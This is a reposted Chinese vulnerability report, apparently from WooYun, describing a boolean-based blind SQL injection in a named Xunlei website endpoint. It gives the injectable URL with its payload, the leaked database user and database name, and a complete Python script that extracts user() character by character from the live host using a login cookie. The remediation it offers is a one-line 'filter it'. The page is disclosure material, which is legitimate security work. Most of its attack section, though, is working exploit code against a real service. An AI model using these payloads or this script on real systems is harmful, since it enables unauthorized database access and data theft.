记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

迅雷某站存在SQL盲注漏洞

2015-10-31 19:00

问题点,boolean-based blind :

code 区域
http://dy.niu.xunlei.com/bonus/querytranstime.do?callback=jQuery18206999116327220966_1442386855464&queryTime=7_day) and 1=1 and (1=1&_=1442386855486



(1)1=1

1=1.png



(2)1=111

1=111.png



(3)length(user())=18

length(user()).png

漏洞证明:

猜解

code 区域
user():[email protected] 



code 区域
database(): niux_jifen



附脚本,需带入迅雷账户登录cookie:

code 区域
#encoding=utf-8

import httplib,time,string,sys,urllib



headers = {

'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36',

'Cookie' : '***'

}

payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')

print '[%s]Start to retrive MySQL User():' % time.strftime('%H:%M:%S', time.localtime())

user = ''



base_url = "/bonus/querytranstime.do?callback=jQuery18206999116327220966_1442386855464&_=1442386855486&"



for i in range(1,19):

for payload in payloads:

conn = httplib.HTTPConnection('dy.niu.xunlei.com', timeout=6)

#s = "cid=16 AND ascii(mid(user()from(%s)for(1)))=%s" % (i, ord(payload))

s = "queryTime=7_day)+and+ascii(mid(user()from(%s)for(1)))=%s+and+(1=1" % (i,ord(payload))

conn.request(method='GET',url = base_url + s,headers=headers)

html_doc = conn.getresponse().read().decode('utf-8')

conn.close()

if html_doc.find(u'积分商城') > 0: # True

user += payload

sys.stdout.write('\r[Retriving]' + user)

sys.stdout.flush()

break

else:

print '.',



print '\n[Done]MySQL user() is ' + user

print time.strftime('%H:%M:%S', time.localtime())

修复方案:

过滤下下!

知识来源: www.wooyun.org/bugs/wooyun-2015-0141592

阅读:125567 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“迅雷某站存在SQL盲注漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

推广

标签云